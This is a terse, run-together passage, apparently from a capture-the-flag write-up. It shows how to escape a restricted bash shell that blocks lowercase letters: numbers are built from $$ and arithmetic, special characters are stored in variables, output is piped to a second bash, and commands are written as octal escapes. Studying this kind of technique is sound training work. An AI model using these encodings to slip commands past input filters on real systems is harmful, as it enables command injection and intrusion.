Rating: 3.0
$$ - bash process id.$((1+2)) - 3.It can not contain any lower case aphebat, but only echo.
$a - $echo$b - $echoecho$c - $echoechoechoecho=$$; echo $echo -> 8We can store the special character in the variable by using backslash. The payload echo=\=; echo echoecho$echo$$ will output echoecho=8. Then we can pass it to bash with |bash. Other example: echo=\'; echo echo $echo$$$echo -> echo '8'.
In the seccond bash, $$ is equal to 10 and we can generate 1 by $(($$==$$)),$((10==10)).For now, we can use 1 and 10 to caculate any number.
echo $'\154\163' -> ls
